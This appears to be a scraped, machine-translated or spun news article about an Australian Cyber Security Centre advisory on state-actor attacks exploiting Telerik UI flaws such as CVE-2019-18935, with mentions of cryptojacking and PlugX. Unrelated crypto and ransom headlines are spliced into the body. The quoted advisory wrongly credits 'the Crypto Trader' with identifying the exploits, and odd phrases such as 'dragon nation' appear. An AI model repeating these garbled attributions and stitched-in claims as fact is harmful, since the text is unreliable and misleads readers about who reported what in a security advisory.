Massive cyber attack on Australia uses exploits for cryptojacking

The Australian Cyber Security Centre said that a group of „state actors“ hacked into Australian networks on June 19 and that one of the vulnerabilities they exploited is related to cryptojacking malware attacks

Bitcoin’s new pricing model suggests an ‚exponential‘ bull run in one month
According to the 48-page report released on June 24, the threat players exploited four critical vulnerabilities in Telerik’s user interface, including CVE-2019-18935, which was recently exploited by the Blue Mockingbird malware band to infect thousands of systems with XMRRig, a Monero mining software (XMR).

The vulnerability is mainly used for cryptojacking purposes

Although the warning did not say whether hackers might have installed cryptojacking malware during the recent massive cyber attack, this vulnerability is the preferred way for cybercriminals to install cryptojacking applications on corporate networks.

„The invisible god“ amassed millions by selling confidential corporate data
The report delves into the vulnerability of CVE-2019-18935, which also has similarities to those reported by Cointelegraph on the Blue Mockingbird attack, although it does not imply that the band was involved in the cyber attack against Australia:

„Other exploits were identified by the Crypto Trader most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: an exploit attempting to run a PowerShell reverse shell; an exploit attempting to run certutil.exe to download another payload; a payload running binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but having no persistence mechanism; a payload listing the absolute path of the web root and writing that path to a file within the web root“.

Were there groups of Chinese state-backed hackers behind the attack?

Nearly 10 Chinese hacker groups, involved in spying activities and allegedly having connections to the Chinese government, have PlugX malware among their weapons, which was one of the malware identified in the Australian government’s report.

Celebrity „dirty secrets“ can cease to be secret if the ransom is not paid
Some Australian officials have suggested that China may be behind the massive cyber attack, as diplomatic problems have been growing between the two countries. It was said that the attack may have occurred after Australia sought an investigation into the origin of the COVID-19 virus, which was not welcomed by the dragon nation’s officials as they considered it a „discriminatory“ charge and responded with commercial retaliation. against the ocean nation.



Zurück nach oben